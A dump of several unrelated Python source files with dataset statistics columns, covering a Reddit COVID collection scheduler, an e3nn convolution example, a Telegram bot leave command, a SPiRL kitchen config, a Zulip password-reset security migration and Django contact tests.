scheduler.add_job(func=collectSubredditsForCovid,
trigger="interval", days=1)
scheduler.start()
| 32.555556
| 69
| 0.793515
|
import praw
import database_infrastructure.dbHandler as dbController
from apscheduler.schedulers.background import BackgroundScheduler
import redditController.collectSubredditsForAsync as redditController
def collectSubredditsForCovid():
redditController.collectSubredditsForCovid('covid')
redditController.collectSubredditsForCovid('covid19')
def collectAsync():
print("registering async background job")
scheduler = BackgroundScheduler()
scheduler.add_job(func=collectSubredditsForCovid,
trigger="interval", days=1)
scheduler.start()
| true
| true
|
790c8392467ad202258620063e9fd445dd446396
| 1,311
|
py
|
Python
|
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
# pylint: disable=missing-docstring, line-too-long, invalid-name, arguments-differ, no-member, pointless-statement
from functools import partial
import torch
from e3nn import Kernel, rs
from e3nn.non_linearities.norm import Norm
from e3nn.non_linearities.rescaled_act import swish
from e3nn.point.operations import Convolution
from e3nn.radial import GaussianRadialModel
# Define the input and output representations
Rs_in = [(1, 0), (2, 1)] # Input = One scalar plus two vectors
Rs_out = [(1, 1)] # Output = One single vector
# Radial model: R+ -> R^d
RadialModel = partial(GaussianRadialModel, max_radius=3.0, number_of_basis=3, h=100, L=1, act=swish)
# kernel: composed on a radial part that contains the learned parameters
# and an angular part given by the spherical hamonics and the Clebsch-Gordan coefficients
K = partial(Kernel, RadialModel=RadialModel)
# Create the convolution module
conv = Convolution(K(Rs_in, Rs_out))
# Module to compute the norm of each irreducible component
norm = Norm(Rs_out)
n = 5 # number of input points
features = rs.randn(1, n, Rs_in, requires_grad=True)
in_geometry = torch.randn(1, n, 3)
out_geometry = torch.zeros(1, 1, 3) # One point at the origin
out = norm(conv(features, in_geometry, out_geometry))
out.backward()
print(out)
print(features.grad)
| 31.214286
| 114
| 0.762777
|
from functools import partial
import torch
from e3nn import Kernel, rs
from e3nn.non_linearities.norm import Norm
from e3nn.non_linearities.rescaled_act import swish
from e3nn.point.operations import Convolution
from e3nn.radial import GaussianRadialModel
Rs_in = [(1, 0), (2, 1)]
Rs_out = [(1, 1)]
RadialModel = partial(GaussianRadialModel, max_radius=3.0, number_of_basis=3, h=100, L=1, act=swish)
K = partial(Kernel, RadialModel=RadialModel)
conv = Convolution(K(Rs_in, Rs_out))
norm = Norm(Rs_out)
n = 5
features = rs.randn(1, n, Rs_in, requires_grad=True)
in_geometry = torch.randn(1, n, 3)
out_geometry = torch.zeros(1, 1, 3)
out = norm(conv(features, in_geometry, out_geometry))
out.backward()
print(out)
print(features.grad)
| true
| true
|
790c83bde7978a528a445d3b39187b4932030a65
| 2,400
|
py
|
Python
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 20
|
2022-02-05T17:35:24.000Z
|
2022-03-31T12:23:29.000Z
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 8
|
2022-02-07T17:29:39.000Z
|
2022-03-18T17:30:31.000Z
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 137
|
2022-02-05T14:50:15.000Z
|
2022-03-31T12:23:42.000Z
|
# MIT License
# Copyright (c) 2022 Muhammed
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Telegram Link : https://telegram.dog/Mo_Tech_Group
# Repo Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot
# License Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot/blob/LuciferMoringstar-Robot/LICENSE
from pyrogram import Client as lucifermoringstar_robot , filters, enums
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from LuciferMoringstar_Robot import ADMINS, CREATOR_USERNAME
@lucifermoringstar_robot.on_message((filters.group | filters.private) & filters.command('leave') & filters.user(ADMINS))
async def leave_bot(bot, update):
if len(update.command) == 1:
return await update.reply_text("𝙶𝙸𝚅𝙴 𝙼𝙴 𝙰 𝙶𝚁𝙾𝚄𝙿 𝙸𝙳")
chat = update.command[1]
try:
chat = int(chat)
except:
chat = chat
try:
pr0fess0r_99 = [[ InlineKeyboardButton('𝙶𝙴𝚃 𝚂𝚄𝙿𝙿𝙾𝚁𝚃', url=f'https://t.me/{CREATOR_USERNAME}') ]]
pr0fess0r_99 = InlineKeyboardMarkup(pr0fess0r_99)
await bot.send_message(chat_id=chat, text="𝙷𝙴𝙻𝙻𝙾 𝙵𝚁𝙸𝙴𝙽𝙳𝚂,\n𝙼𝚈 𝙼𝙰𝚂𝚃𝙴𝚁 𝙷𝙰𝚂 𝚃𝙾𝙻𝙳 𝙼𝙴 𝚃𝙾 𝙻𝙴𝙰𝚅𝙴 𝙵𝚁𝙾𝙼 𝙶𝚁𝙾𝚄𝙿. 𝚂𝙾 𝙸 𝙶𝙾 😛. 𝙸𝙵 𝚈𝙾𝚄 𝚆𝙰𝙽𝙽𝙰 𝙰𝙳𝙳 𝙼𝙴 𝙰𝙶𝙰𝙸𝙽 𝙲𝙾𝙽𝚃𝙰𝙲𝚃 𝙼𝙴", reply_markup=pr0fess0r_99)
await bot.leave_chat(chat)
await update.reply(f"𝙻𝙴𝙵𝚃 𝚃𝙷𝙴 𝙲𝙷𝙰𝚃 `{chat}`")
except Exception as e:
await update.reply(f'𝙴𝚁𝚁𝙾𝚁 - {e}')
| 50
| 186
| 0.750833
|
from pyrogram import Client as lucifermoringstar_robot , filters, enums
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from LuciferMoringstar_Robot import ADMINS, CREATOR_USERNAME
@lucifermoringstar_robot.on_message((filters.group | filters.private) & filters.command('leave') & filters.user(ADMINS))
async def leave_bot(bot, update):
if len(update.command) == 1:
return await update.reply_text("𝙶𝙸𝚅𝙴 𝙼𝙴 𝙰 𝙶𝚁𝙾𝚄𝙿 𝙸𝙳")
chat = update.command[1]
try:
chat = int(chat)
except:
chat = chat
try:
pr0fess0r_99 = [[ InlineKeyboardButton('𝙶𝙴𝚃 𝚂𝚄𝙿𝙿𝙾𝚁𝚃', url=f'https://t.me/{CREATOR_USERNAME}') ]]
pr0fess0r_99 = InlineKeyboardMarkup(pr0fess0r_99)
await bot.send_message(chat_id=chat, text="𝙷𝙴𝙻𝙻𝙾 𝙵𝚁𝙸𝙴𝙽𝙳𝚂,\n𝙼𝚈 𝙼𝙰𝚂𝚃𝙴𝚁 𝙷𝙰𝚂 𝚃𝙾𝙻𝙳 𝙼𝙴 𝚃𝙾 𝙻𝙴𝙰𝚅𝙴 𝙵𝚁𝙾𝙼 𝙶𝚁𝙾𝚄𝙿. 𝚂𝙾 𝙸 𝙶𝙾 😛. 𝙸𝙵 𝚈𝙾𝚄 𝚆𝙰𝙽𝙽𝙰 𝙰𝙳𝙳 𝙼𝙴 𝙰𝙶𝙰𝙸𝙽 𝙲𝙾𝙽𝚃𝙰𝙲𝚃 𝙼𝙴", reply_markup=pr0fess0r_99)
await bot.leave_chat(chat)
await update.reply(f"𝙻𝙴𝙵𝚃 𝚃𝙷𝙴 𝙲𝙷𝙰𝚃 `{chat}`")
except Exception as e:
await update.reply(f'𝙴𝚁𝚁𝙾𝚁 - {e}')
| true
| true
|
790c844cb49cb3321bf8dff698dec4c13b34d721
| 1,945
|
py
|
Python
|
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | 8
|
2021-10-14T03:14:23.000Z
|
2022-03-15T21:31:17.000Z
|
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | null | null | null |
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | 1
|
2021-09-13T20:42:28.000Z
|
2021-09-13T20:42:28.000Z
|
import os
from spirl.models.closed_loop_spirl_mdl import GoalClSPiRLMdl
from spirl.components.logger import Logger
from spirl.utils.general_utils import AttrDict
from spirl.configs.default_data_configs.kitchen import data_spec
from spirl.components.evaluator import TopOfNSequenceEvaluator
from spirl.data.kitchen.src.kitchen_data_loader import KitchenStateSeqDataset
current_dir = os.path.dirname(os.path.realpath(__file__))
fewshot_dataset = KitchenStateSeqDataset(
data_path='data/kitchen/kitchen-demo-topknob_bottomknob_hinge_slide.hdf5',
num_demo=1,
subseq_len=10,
)
env = AttrDict(
task_list = ['top burner', 'bottom burner', 'hinge cabinet', 'slide cabinet']
)
contra_model_cf = AttrDict(
state_dimension=data_spec.state_dim,
hidden_size=128,
feature_size=32,
)
configuration = {
'model': GoalClSPiRLMdl,
'logger': Logger,
'data_dir': '.',
'epoch_cycles_train': 1,
'evaluator': TopOfNSequenceEvaluator,
'top_of_n_eval': 100,
'top_comp_metric': 'mse',
'batch_size': 128,
'num_epochs': 50,
'fewshot_data': fewshot_dataset,
'fewshot_batch_size': 128,
'contra_config': contra_model_cf,
'contra_ckpt': './experiments/contrastive/kitchen/exact-mixed-all/exact_model.pt',
'finetune_vae': True,
}
configuration = AttrDict(configuration)
model_config = AttrDict(
state_dim=data_spec.state_dim,
action_dim=data_spec.n_actions,
n_rollout_steps=10,
kl_div_weight=5e-4,
nz_enc=128,
nz_mid=128,
n_processing_layers=5,
cond_decode=True,
checkpt_path=f'{os.environ["EXP_DIR"]}/skill_prior_learning/kitchen/hierarchical_cl_gc_top_bot_excluded'
)
# Dataset
data_config = AttrDict()
data_config.dataset_spec = data_spec
data_config.dataset_spec['dataset_path'] = './data/kitchen/kitchen-mixed-top-bot-excluded.hdf5'
data_config.dataset_spec.subseq_len = model_config.n_rollout_steps + 1 # flat last action from seq gets cropped
| 30.873016
| 112
| 0.759897
|
import os
from spirl.models.closed_loop_spirl_mdl import GoalClSPiRLMdl
from spirl.components.logger import Logger
from spirl.utils.general_utils import AttrDict
from spirl.configs.default_data_configs.kitchen import data_spec
from spirl.components.evaluator import TopOfNSequenceEvaluator
from spirl.data.kitchen.src.kitchen_data_loader import KitchenStateSeqDataset
current_dir = os.path.dirname(os.path.realpath(__file__))
fewshot_dataset = KitchenStateSeqDataset(
data_path='data/kitchen/kitchen-demo-topknob_bottomknob_hinge_slide.hdf5',
num_demo=1,
subseq_len=10,
)
env = AttrDict(
task_list = ['top burner', 'bottom burner', 'hinge cabinet', 'slide cabinet']
)
contra_model_cf = AttrDict(
state_dimension=data_spec.state_dim,
hidden_size=128,
feature_size=32,
)
configuration = {
'model': GoalClSPiRLMdl,
'logger': Logger,
'data_dir': '.',
'epoch_cycles_train': 1,
'evaluator': TopOfNSequenceEvaluator,
'top_of_n_eval': 100,
'top_comp_metric': 'mse',
'batch_size': 128,
'num_epochs': 50,
'fewshot_data': fewshot_dataset,
'fewshot_batch_size': 128,
'contra_config': contra_model_cf,
'contra_ckpt': './experiments/contrastive/kitchen/exact-mixed-all/exact_model.pt',
'finetune_vae': True,
}
configuration = AttrDict(configuration)
model_config = AttrDict(
state_dim=data_spec.state_dim,
action_dim=data_spec.n_actions,
n_rollout_steps=10,
kl_div_weight=5e-4,
nz_enc=128,
nz_mid=128,
n_processing_layers=5,
cond_decode=True,
checkpt_path=f'{os.environ["EXP_DIR"]}/skill_prior_learning/kitchen/hierarchical_cl_gc_top_bot_excluded'
)
data_config = AttrDict()
data_config.dataset_spec = data_spec
data_config.dataset_spec['dataset_path'] = './data/kitchen/kitchen-mixed-top-bot-excluded.hdf5'
data_config.dataset_spec.subseq_len = model_config.n_rollout_steps + 1
| true
| true
|
790c8482c1e66dc7260d46dfd9b7f13d639df13f
| 1,019
|
py
|
Python
|
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
# Name:
# Date:
# proj02: sum
# Write a program that prompts the user to enter numbers, one per line,
# ending with a line containing 0, and keep a running sum of the numbers.
# Only print out the sum after all the numbers are entered
# (at least in your final version). Each time you read in a number,
# you can immediately use it for your sum,
# and then be done with the number just entered.
# Example:
# Enter a number to sum, or 0 to indicate you are finished: 4
# Enter a number to sum, or 0 to indicate you are finished: 5
# Enter a number to sum, or 0 to indicate you are finished: 2
# Enter a number to sum, or 0 to indicate you are finished: 10
# Enter a number to sum, or 0 to indicate you are finished: 0
# The sum of your numbers is: 21
input_sum = 0
var = 1
while var != 0:
input1 = raw_input("Enter a number to sum, or 0 to indicate you are finished: ")
input_sum = int(input1) + input_sum
if int(input1) == 0:
var = 0
print"The sum of your numbers is: " + str(input_sum)
| 35.137931
| 84
| 0.697743
|
input_sum = 0
var = 1
while var != 0:
input1 = raw_input("Enter a number to sum, or 0 to indicate you are finished: ")
input_sum = int(input1) + input_sum
if int(input1) == 0:
var = 0
print"The sum of your numbers is: " + str(input_sum)
| false
| true
|
790c8484bbd71d0aa80124fd55ed271bdea204d5
| 11,210
|
py
|
Python
|
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | null | null | null |
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | null | null | null |
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | 1
|
2020-07-06T11:43:28.000Z
|
2020-07-06T11:43:28.000Z
|
# Generated by Django 1.11.24 on 2019-10-16 22:48
from typing import Any, Set, Union
import ujson
from django.conf import settings
from django.contrib.auth.hashers import check_password, make_password
from django.db import migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.utils.timezone import now as timezone_now
from zerver.lib.cache import cache_delete, user_profile_by_api_key_cache_key
from zerver.lib.queue import queue_json_publish
from zerver.lib.utils import generate_api_key
def ensure_no_empty_passwords(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
"""With CVE-2019-18933, it was possible for certain users created
using social login (e.g. Google/GitHub auth) to have the empty
string as their password in the Zulip database, rather than
Django's "unusable password" (i.e. no password at all). This was a
serious security issue for organizations with both password and
Google/GitHub authentication enabled.
Combined with the code changes to prevent new users from entering
this buggy state, this migration sets the intended "no password"
state for any users who are in this buggy state, as had been
intended.
While this bug was discovered by our own development team and we
believe it hasn't been exploited in the wild, out of an abundance
of caution, this migration also resets the personal API keys for
all users where Zulip's database-level logging cannot **prove**
that user's current personal API key was never accessed using this
bug.
There are a few ways this can be proven: (1) the user's password
has never been changed and is not the empty string,
or (2) the user's personal API key has changed since that user last
changed their password (which is not ''). Both constitute proof
because this bug cannot be used to gain the access required to change
or reset a user's password.
Resetting those API keys has the effect of logging many users out
of the Zulip mobile and terminal apps unnecessarily (e.g. because
the user changed their password at any point in the past, even
though the user never was affected by the bug), but we're
comfortable with that cost for ensuring that this bug is
completely fixed.
To avoid this inconvenience for self-hosted servers which don't
even have EmailAuthBackend enabled, we skip resetting any API keys
if the server doesn't have EmailAuthBackend configured.
"""
UserProfile = apps.get_model('zerver', 'UserProfile')
RealmAuditLog = apps.get_model('zerver', 'RealmAuditLog')
# Because we're backporting this migration to the Zulip 2.0.x
# series, we've given it migration number 0209, which is a
# duplicate with an existing migration already merged into Zulip
# master. Migration 0247_realmauditlog_event_type_to_int.py
# changes the format of RealmAuditLog.event_type, so we need the
# following conditional block to determine what values to use when
# searching for the relevant events in that log.
event_type_class = RealmAuditLog._meta.get_field('event_type').get_internal_type()
if event_type_class == 'CharField':
USER_PASSWORD_CHANGED: Union[int, str] = 'user_password_changed'
USER_API_KEY_CHANGED: Union[int, str] = 'user_api_key_changed'
else:
USER_PASSWORD_CHANGED = 122
USER_API_KEY_CHANGED = 127
# First, we do some bulk queries to collect data we'll find useful
# in the loop over all users below.
# Users who changed their password at any time since account
# creation. These users could theoretically have started with an
# empty password, but set a password later via the password reset
# flow. If their API key has changed since they changed their
# password, we can prove their current API key cannot have been
# exposed; we store those users in
# password_change_user_ids_no_reset_needed.
password_change_user_ids = set(RealmAuditLog.objects.filter(
event_type=USER_PASSWORD_CHANGED).values_list("modified_user_id", flat=True))
password_change_user_ids_api_key_reset_needed: Set[int] = set()
password_change_user_ids_no_reset_needed: Set[int] = set()
for user_id in password_change_user_ids:
# Here, we check the timing for users who have changed
# their password.
# We check if the user changed their API key since their first password change.
query = RealmAuditLog.objects.filter(
modified_user=user_id, event_type__in=[USER_PASSWORD_CHANGED,
USER_API_KEY_CHANGED]
).order_by("event_time")
earliest_password_change = query.filter(event_type=USER_PASSWORD_CHANGED).first()
# Since these users are in password_change_user_ids, this must not be None.
assert earliest_password_change is not None
latest_api_key_change = query.filter(event_type=USER_API_KEY_CHANGED).last()
if latest_api_key_change is None:
# This user has never changed their API key. As a
# result, even though it's very likely this user never
# had an empty password, they have changed their
# password, and we have no record of the password's
# original hash, so we can't prove the user's API key
# was never affected. We schedule this user's API key
# to be reset.
password_change_user_ids_api_key_reset_needed.add(user_id)
elif earliest_password_change.event_time <= latest_api_key_change.event_time:
# This user has changed their password before
# generating their current personal API key, so we can
# prove their current personal API key could not have
# been exposed by this bug.
password_change_user_ids_no_reset_needed.add(user_id)
else:
password_change_user_ids_api_key_reset_needed.add(user_id)
if password_change_user_ids_no_reset_needed and settings.PRODUCTION:
# We record in this log file users whose current API key was
# generated after a real password was set, so there's no need
# to reset their API key, but because they've changed their
# password, we don't know whether or not they originally had a
# buggy password.
#
# In theory, this list can be recalculated using the above
# algorithm modified to only look at events before the time
# this migration was installed, but it's helpful to log it as well.
with open("/var/log/zulip/0209_password_migration.log", "w") as log_file:
line = "No reset needed, but changed password: {}\n"
log_file.write(line.format(password_change_user_ids_no_reset_needed))
AFFECTED_USER_TYPE_EMPTY_PASSWORD = 'empty_password'
AFFECTED_USER_TYPE_CHANGED_PASSWORD = 'changed_password'
MIGRATION_ID = '0209_user_profile_no_empty_password'
def write_realm_audit_log_entry(user_profile: Any,
event_time: Any, event_type: Any,
affected_user_type: str) -> None:
RealmAuditLog.objects.create(
realm=user_profile.realm,
modified_user=user_profile,
event_type=event_type,
event_time=event_time,
extra_data=ujson.dumps({
'migration_id': MIGRATION_ID,
'affected_user_type': affected_user_type,
})
)
# If Zulip's built-in password authentication is not enabled on
# the server level, then we plan to skip resetting any users' API
# keys, since the bug requires EmailAuthBackend.
email_auth_enabled = 'zproject.backends.EmailAuthBackend' in settings.AUTHENTICATION_BACKENDS
# A quick note: This query could in theory exclude users with
# is_active=False, is_bot=True, or realm__deactivated=True here to
# accessing only active human users in non-deactivated realms.
# But it's better to just be thorough; users can be reactivated,
# and e.g. a server admin could manually edit the database to
# change a bot into a human user if they really wanted to. And
# there's essentially no harm in rewriting state for a deactivated
# account.
for user_profile in UserProfile.objects.all():
event_time = timezone_now()
if check_password('', user_profile.password):
# This user currently has the empty string as their password.
# Change their password and record that we did so.
user_profile.password = make_password(None)
update_fields = ["password"]
write_realm_audit_log_entry(user_profile, event_time,
USER_PASSWORD_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
if email_auth_enabled and not user_profile.is_bot:
# As explained above, if the built-in password authentication
# is enabled, reset the API keys. We can skip bot accounts here,
# because the `password` attribute on a bot user is useless.
reset_user_api_key(user_profile)
update_fields.append("api_key")
event_time = timezone_now()
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
user_profile.save(update_fields=update_fields)
continue
elif email_auth_enabled and \
user_profile.id in password_change_user_ids_api_key_reset_needed:
# For these users, we just need to reset the API key.
reset_user_api_key(user_profile)
user_profile.save(update_fields=["api_key"])
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_CHANGED_PASSWORD)
def reset_user_api_key(user_profile: Any) -> None:
old_api_key = user_profile.api_key
user_profile.api_key = generate_api_key()
cache_delete(user_profile_by_api_key_cache_key(old_api_key))
# Like with any API key change, we need to clear any server-side
# state for sending push notifications to mobile app clients that
# could have been registered with the old API key. Fortunately,
# we can just write to the queue processor that handles sending
# those notices to the push notifications bouncer service.
event = {'type': 'clear_push_device_tokens',
'user_profile_id': user_profile.id}
queue_json_publish("deferred_work", event)
class Migration(migrations.Migration):
atomic = False
dependencies = [
('zerver', '0208_add_realm_night_logo_fields'),
]
operations = [
migrations.RunPython(ensure_no_empty_passwords,
reverse_code=migrations.RunPython.noop),
]
| 48.73913
| 97
| 0.692507
|
from typing import Any, Set, Union
import ujson
from django.conf import settings
from django.contrib.auth.hashers import check_password, make_password
from django.db import migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.utils.timezone import now as timezone_now
from zerver.lib.cache import cache_delete, user_profile_by_api_key_cache_key
from zerver.lib.queue import queue_json_publish
from zerver.lib.utils import generate_api_key
def ensure_no_empty_passwords(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
UserProfile = apps.get_model('zerver', 'UserProfile')
RealmAuditLog = apps.get_model('zerver', 'RealmAuditLog')
# series, we've given it migration number 0209, which is a
event_type_class = RealmAuditLog._meta.get_field('event_type').get_internal_type()
if event_type_class == 'CharField':
USER_PASSWORD_CHANGED: Union[int, str] = 'user_password_changed'
USER_API_KEY_CHANGED: Union[int, str] = 'user_api_key_changed'
else:
USER_PASSWORD_CHANGED = 122
USER_API_KEY_CHANGED = 127
# in the loop over all users below.
# Users who changed their password at any time since account
# creation. These users could theoretically have started with an
# empty password, but set a password later via the password reset
# flow. If their API key has changed since they changed their
# password, we can prove their current API key cannot have been
# exposed; we store those users in
# password_change_user_ids_no_reset_needed.
password_change_user_ids = set(RealmAuditLog.objects.filter(
event_type=USER_PASSWORD_CHANGED).values_list("modified_user_id", flat=True))
password_change_user_ids_api_key_reset_needed: Set[int] = set()
password_change_user_ids_no_reset_needed: Set[int] = set()
for user_id in password_change_user_ids:
# Here, we check the timing for users who have changed
# their password.
# We check if the user changed their API key since their first password change.
query = RealmAuditLog.objects.filter(
modified_user=user_id, event_type__in=[USER_PASSWORD_CHANGED,
USER_API_KEY_CHANGED]
).order_by("event_time")
earliest_password_change = query.filter(event_type=USER_PASSWORD_CHANGED).first()
# Since these users are in password_change_user_ids, this must not be None.
assert earliest_password_change is not None
latest_api_key_change = query.filter(event_type=USER_API_KEY_CHANGED).last()
if latest_api_key_change is None:
# This user has never changed their API key. As a
# result, even though it's very likely this user never
# original hash, so we can't prove the user's API key
# was never affected. We schedule this user's API key
password_change_user_ids_api_key_reset_needed.add(user_id)
elif earliest_password_change.event_time <= latest_api_key_change.event_time:
password_change_user_ids_no_reset_needed.add(user_id)
else:
password_change_user_ids_api_key_reset_needed.add(user_id)
if password_change_user_ids_no_reset_needed and settings.PRODUCTION:
# to reset their API key, but because they've changed their
# buggy password.
#
# In theory, this list can be recalculated using the above
# algorithm modified to only look at events before the time
# this migration was installed, but it's helpful to log it as well.
with open("/var/log/zulip/0209_password_migration.log", "w") as log_file:
line = "No reset needed, but changed password: {}\n"
log_file.write(line.format(password_change_user_ids_no_reset_needed))
AFFECTED_USER_TYPE_EMPTY_PASSWORD = 'empty_password'
AFFECTED_USER_TYPE_CHANGED_PASSWORD = 'changed_password'
MIGRATION_ID = '0209_user_profile_no_empty_password'
def write_realm_audit_log_entry(user_profile: Any,
event_time: Any, event_type: Any,
affected_user_type: str) -> None:
RealmAuditLog.objects.create(
realm=user_profile.realm,
modified_user=user_profile,
event_type=event_type,
event_time=event_time,
extra_data=ujson.dumps({
'migration_id': MIGRATION_ID,
'affected_user_type': affected_user_type,
})
)
# the server level, then we plan to skip resetting any users' API
email_auth_enabled = 'zproject.backends.EmailAuthBackend' in settings.AUTHENTICATION_BACKENDS
# and e.g. a server admin could manually edit the database to
# change a bot into a human user if they really wanted to. And
# there's essentially no harm in rewriting state for a deactivated
for user_profile in UserProfile.objects.all():
event_time = timezone_now()
if check_password('', user_profile.password):
user_profile.password = make_password(None)
update_fields = ["password"]
write_realm_audit_log_entry(user_profile, event_time,
USER_PASSWORD_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
if email_auth_enabled and not user_profile.is_bot:
reset_user_api_key(user_profile)
update_fields.append("api_key")
event_time = timezone_now()
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
user_profile.save(update_fields=update_fields)
continue
elif email_auth_enabled and \
user_profile.id in password_change_user_ids_api_key_reset_needed:
reset_user_api_key(user_profile)
user_profile.save(update_fields=["api_key"])
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_CHANGED_PASSWORD)
def reset_user_api_key(user_profile: Any) -> None:
old_api_key = user_profile.api_key
user_profile.api_key = generate_api_key()
cache_delete(user_profile_by_api_key_cache_key(old_api_key))
event = {'type': 'clear_push_device_tokens',
'user_profile_id': user_profile.id}
queue_json_publish("deferred_work", event)
class Migration(migrations.Migration):
atomic = False
dependencies = [
('zerver', '0208_add_realm_night_logo_fields'),
]
operations = [
migrations.RunPython(ensure_no_empty_passwords,
reverse_code=migrations.RunPython.noop),
]
| true
| true
|
790c860c3dff2bab32c7d3d6ac54f79baebccdb6
| 2,840
|
py
|
Python
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 12
|
2018-01-30T00:44:06.000Z
|
2020-07-13T05:20:48.000Z
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 36
|
2018-03-06T17:49:50.000Z
|
2020-06-23T19:26:00.000Z
|
systori/apps/directory/test_models.py
|
systori/systori
|
e309c63e735079ff6032fdaf1db354ec872b28b1
|
[
"BSD-3-Clause"
] | 3
|
2018-08-03T07:03:09.000Z
|
2020-07-09T20:21:10.000Z
|
from django.test import TestCase
from ..company.models import Company
from ..project.models import *
from .models import *
def create_contact_data(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.contact = Contact.objects.create(first_name="Ludwig", last_name="von Mises")
class ContactProjectTests(TestCase):
def setUp(self):
create_contact_data(self)
def test_no_association(self):
self.assertEquals(0, len(self.contact.projects.all()))
self.assertEquals(0, len(self.contact.project_contacts.all()))
self.assertEquals(0, len(self.project.contacts.all()))
self.assertEquals(0, len(self.project.project_contacts.all()))
def test_customer_association(self):
ProjectContact.objects.create(
project=self.project,
contact=self.contact,
association=ProjectContact.CUSTOMER,
)
self.assertEquals(1, len(self.contact.projects.all()))
self.assertEquals(1, len(self.project.contacts.all()))
pc = ProjectContact.objects.get(project=self.project)
self.assertEquals(ProjectContact.CUSTOMER, pc.association)
class BillableContactTests(TestCase):
def setUp(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.pc1 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 1", last_name="B 1"),
)
self.pc2 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 2", last_name="B 2"),
)
def test_no_billable_set(self):
self.assertEqual(
0, self.project.project_contacts.filter(is_billable=True).count()
)
def test_billable_set(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
